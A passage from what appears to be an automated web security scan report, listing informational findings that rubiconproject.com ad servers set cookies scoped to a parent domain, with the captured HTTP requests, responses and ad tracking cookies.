Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13378^2&12566^3; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3188003.js^3^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1971

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

13.97. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/26848-15.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7845/12566/26848-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2&12566^3&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599882&2748761.js^1^1317599431^1317599431&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

13.98. http://optimized-by.rubiconproject.com/a/8154/13209/25051-1.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8154/13209/25051-1.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/8154/13209/25051-1.js?cb=0.5513019266072661&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; ruid=154e62c97432177b6a4bcd01^8^1317595852^840399722; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ses15=13378^2; csi15=3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:48:53 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8154/13209; expires=Mon, 03-Oct-2011 00:48:53 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk1=0; expires=Mon, 03-Oct-2011 00:48:53 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses1=13209^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29466; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi1=3226251.js^2^1317599333^1317599333; expires=Sun, 09-Oct-2011 23:48:53 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1423

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3226251"
...[SNIP]...

13.99. http://optimized-by.rubiconproject.com/a/8154/13209/25051-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8154/13209/25051-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/8154/13209/25051-15.js?cb=0.1704533719457686&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ses15=13378^2; csi15=3209195.js^2^1317595891^1317598688; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=8154/13209; rdk1=0; ses1=13209^1; csi1=3226251.js^1^1317599333^1317599333

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:01 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8154/13209; expires=Mon, 03-Oct-2011 00:49:01 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:49:01 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29458; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3226249.js^2^1317599341^1317599341&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:49:01 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1324

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3226249"
...[SNIP]...

13.100. http://optimized-by.rubiconproject.com/a/8154/13209/25051-8.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8154/13209/25051-8.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/8154/13209/25051-8.js?cb=0.03134333691559732&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; rdk=8154/13209; rdk1=0; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:38 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8154/13209; expires=Mon, 03-Oct-2011 00:53:38 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk8=0; expires=Mon, 03-Oct-2011 00:53:38 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses8=13209^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29181; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi8=3226247.js^2^1317599462^1317599618; expires=Sun, 09-Oct-2011 23:53:38 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1324

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3226247"
...[SNIP]...

13.101. http://optimized-by.rubiconproject.com/a/dk.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=x29f159.js&size_id=15&account_id=7743&site_id=12359&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; rdk=7743/12359; ses15=13378^2&13209^2&12566^1&12359^1; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:41 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 00:52:41 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=1; expires=Mon, 03-Oct-2011 00:52:41 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2&12566^16cd1be6a76b2fd99d77d4996&12359^10; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29238; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1426

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3198298"
...[SNIP]...

13.102. http://pixel.rubiconproject.com/di.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /di.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /di.php?v=2372||2373|0||3810||2374||&r=3761|0,3169,3578,3577,2110,2195,2196,2197,2579,2198,4134,3734,2199,2364,2362,2363,2200,3810,2111,2494,2201,3513,2202,2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375, HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; rpx=4940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C694%2C3%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C552%2C14%2C%2C%265671%3D14742%2C608%2C2%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C608%2C2%2C%2C%267727%3D14742%2C553%2C3%2C%2C%265852%3D14742%2C488%2C2%2C%2C%266286%3D14843%2C141%2C2%2C%2C%266643%3D14894%2C0%2C1%2C%2C%264554%3D15350%2C0%2C1%2C%2C; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; rdk=7743/12359; ses15=13378^2&13209^3&12566^2&12359^2; cd=false; khaos=GT3FYRAA-6-CO8F

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1%262372%3D1%263810%3D1%262374%3D1; expires=Sat, 31-Mar-2012 00:01:11 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.103. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=6432&rnd1317601647 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.igougo.com%2Ftraveldeals%2Fratefinder.aspx%3FTypeID%3D1%26SourceID%3DTVLY-dRF-Popunder%26adlt%3D1%26end%3DBoston%26rm%3D1%26dest%3DBoston%2C%2520undefined%2520undefined%26strtDate%3D10%2F04%2F2011%26endDate%3D10%2F07%2F2011&jsref=http%3A%2F%2Fwww.travelocity.com%2FpopWindow2%3FtheDomain%3Dwww.travelocity.com%26selectedForm%3Dcb-form-ho%26formPrefix%3DHO%26fromDate%3Ddd%26fromMonth%3Dmm%26fromYear%3Dyyyy%26toDate%3Ddd%26toMonth%3Dmm%26toYear%3Dyyyy%26theAdtoShow%3Dad2%26dest%3DBOS%26triptype%3D%26noOfRooms%3D1%26noOfAdults%3D1%26service%3DTRAVELOCITY%26oneway%3D&rnd=1317601643778
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
